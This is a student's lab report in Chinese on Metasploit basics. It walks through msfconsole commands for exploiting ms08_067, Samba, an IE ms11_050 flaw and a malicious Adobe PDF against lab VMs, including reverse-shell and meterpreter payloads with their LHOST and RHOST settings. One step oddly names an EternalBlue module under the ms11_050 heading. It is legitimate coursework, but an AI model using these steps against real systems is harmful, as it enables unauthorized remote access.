zoukankan      html  css  js  c++  java
  • 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    《网络对抗技术》Exp5 MSF基础应用 Week8

    一、实验目标与内容

    • 1.实践内容(3.5分)

      • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体我尝试了:

        • 1.1主动攻击实践:

          • 靶机为WinXPEnSP3的ms08_067(失败,不唯一);
          • 靶机为Linux Metasploit的samba的“军刀”漏洞(成功,唯一);
        • 1.2 针对浏览器的攻击(靶机为Win7):

          • ms11_050,载荷为payload windows/metsvc_bind_tcp(失败,唯一);
          • 载荷为generic/shell_reverse_tcp(成功,不唯一);
          • 载荷为windows/x64/shell_bind_tcp(成功,唯一)
        • 1.3 一个针对客户端的攻击:Adobe(成功不唯一);

        • 1.4 成功应用辅助模块:scanner/http/options(成功,不唯一)。

    • 2.一些问题

      • 2.1 用自己的话解释什么是exploit,payload,encode?

      • exploit:执行攻击

      • payload:执行攻击时所使用的道具

      • encode:对道具进行包装

      • 2.2.离实战还缺些什么技术或步骤?

      • 免杀技术吧,现在我们还不能很好地实现真正意义上的免杀;还有就是我们制作的后门程序都很简单,,一般人看都看出来是不正经软件了。

    二、实验步骤

    一:靶机为Linux Metasploit的samba漏洞

    • 1.打开kali与Linux Metasploit,测试两虚拟机之间能否ping通:

    • 2.查看之前写好的脚本

    • 3.在命令行输入msfconsole -r msfcli.rc运行在之前我已经写好的脚本,攻击成功

    二:靶机为WinXPEnSP3的ms08_067漏洞

    • 1.打开WinXPEnSP3虚拟机。将其网络连接方式改为NAT模式后重启。测试其与kali能否相互ping通:

    • 2.切换到kali虚拟机界面,输入msfconsole启动msf。启动后输入search ms08_067,出现了一条漏洞信息。

    • 3.输入use windows/smb/ms08_067_netapi

    • 4.输入show payload,出现载荷列表,发现有100多个载荷

    • 5.输入set payload generic/shell_reverse_tcp设置载荷。

    • 6.输入show options查看参数。发现源IP和目的IP还没设置,输入set PHOST 192.168.10.12set LHOST 10.10.10.128设定参数

    • 7.输入run开始攻击。攻击失败。(这里好多同学都成功了哎,,不知道是不是下载途径不一样的原因。)

    针对浏览器的攻击(靶机为Win7):ms11_050(由于攻击的步骤大同小异,接下来就不每次操作都截图了~)

    • 1.打开Win7虚拟机。测试能否与kali相互ping通

    • 2.在kali打开msf后,输入search ms11_050,查询跟漏洞相关的信息

    • 3.输入use exploit/windows/smb/ms17_010_eternalblue

    • 4.输入show payloads,查询有哪些载荷

    • 5.输入set payload generic/shell_reverse_tcp设定输入载荷

    • 6.输入show options,查看有哪些参数需要设置。发现还空缺的参数是LHOST和RHOST。输入set RHOST 10.10.10.132set LHOST 10.10.10.128设定参数

    • 7.输入exploit开始攻击,执行一段时间后卡在了如下界面:

    • 8.一开始我以为是在攻击过程中卡住了,等了一会后又重启了好几次,后来上网查后发现到这一步的时候需要在靶机上的IE浏览器上输入[攻击方IP地址]/*,然后才能回连成功。

    • 9.在靶机上打开IE浏览器,输入10.10.10.128/5214

    • 10.回到kali,输入ipconfig指令和pwd指令进行测验,连接成功:

    • 11.换一个payload:set payload windows/metsvc_bind_tcp

    • 12.输入参数后连接失败:

    • 13.再换一个payload:windows/x64/shell_bind_tcp,这回在Win7打开IE后输入10.10.10.128,回连成功

    针对客户端的攻击(靶机为Win7):Adobe

    • 1.在kali打开msf后,输入search adobe,查询跟漏洞相关的信息

    • 2.输入use windows/fileformat/adobe_cooltype_sing

    • 3.输入show payloads,查询有哪些载荷

    • 4.输入set payload windows/meterpreter/reverse_tcp设定输入载荷

    • 5.输入show options,查看有哪些参数需要设置。发现还空缺的参数是LHOST和RHOST。输入set RHOST 10.10.10.132set LHOST 10.10.10.128设定参数

    • 6.提示在.msf/local下生成了pdf。

    • 7.将生成的pdf放到Win7上面去

    • 8.在msf输入use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp 后进入监听模式,设定LHOSTset LHOST 10.10.10.128,输入exploit开始监听。这时候切换到Win7打开该pdf,回连成功:

    成功应用辅助模块(靶机为Windows 2008)

    • 1.打开Win 2008,测试与kali能否相互ping通
    • 2.在kali的msf下输入search auxiliary查找辅助模块,发现有1000多个。
    • 3.在经历了n多次的尝试失败后终于找到了一个成功的:scanner/http/options

    三、遇到的问题

    -1.在攻击靶机为WinXPEnSP3的ms08_067漏洞之前,测试能否ping通,发现不能ping通。

    • 解决方法:这里是因为我根据教材的环境配置把XP设置为了内网,而kali在DMZ区,所以需要启动网关服务器才可以ping通。因此在这里需要启动我的第三台虚拟机Linux Metasploit

    • 2.在实验中,有时候靶机并不存在我们想要攻击的漏洞,一个一个试又要花费很长的时间。在同学的帮助下,我发现了可以用nmap来提前检测漏洞是否存在。不过这已经是我在做完所有实验步骤之后才知道的了。我拿了一个我攻击失败了的漏洞(靶机为WinXPEnSP3的ms08_067)来进行尝试,在命令行输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.10.128,发现没有该漏洞相关的字段,不过可以看到目标系统。

    四、心得体会

    • 第一次看到这个题目的时候还是感觉比较欣喜的。因为我最近刚好在自学教材,所以电脑上有很多的靶机,对于msf命令的使用也比较熟练,做起来较为简单,出现的问题也较多的是在看不懂英文。。。不过我感觉也不能就这样感到满足,因为实验毕竟是很有限的,很多东西其实是很理想化的,在现实生活中不可能奏效。每次在做实验的时候都会想要尝试一下比较“实际”的操作,比如连接到不同网段,比如能够攻击比较新的操作系统然后不被发现等等。但是现在自己的这方面能力还是比较弱,至今没有成功过。相信今后会成功的~
    • 同时,这周我跟着大佬们去参加了CTF。其实我也只是学了20多天的web模块,但是我还是坚持要去体验一下,想看看这个比赛是怎么样的,也想看看我们的课程和它之间的联系。我还是很庆幸这两天花了很多时间来参加这个的虽然做不出来,但做的过程中多掌握了很多课程内没有的知识。同时,国内那些大佬们也让我深深地感到自愧不如,虽然在电科院成绩还可以,但是真是没办法拿出去跟人比。以后还是要多学习信安方面的技能,不能满足于校内,应该走出学校,多看看其他学校的水平。
  • 相关阅读:
    Atitit.Java exe bat  作为windows系统服务程序运行
    Atitit. Object-c语言 的新的特性  attilax总结
    Atitit. Object-c语言 的新的特性  attilax总结
    Atitit。Time base gc 垃圾 资源 收集的原理与设计
    Atitit。Time base gc 垃圾 资源 收集的原理与设计
    Atitit.go语言golang语言的新的特性  attilax总结
    Atitit.go语言golang语言的新的特性  attilax总结
    Atitit.pdf 预览 转换html attilax总结
    Atitit.pdf 预览 转换html attilax总结
    Atitit.office word  excel  ppt pdf 的web在线预览方案与html转换方案 attilax 总结
  • 原文地址:https://www.cnblogs.com/zhuwenyuan/p/10739717.html
Copyright © 2011-2022 走看看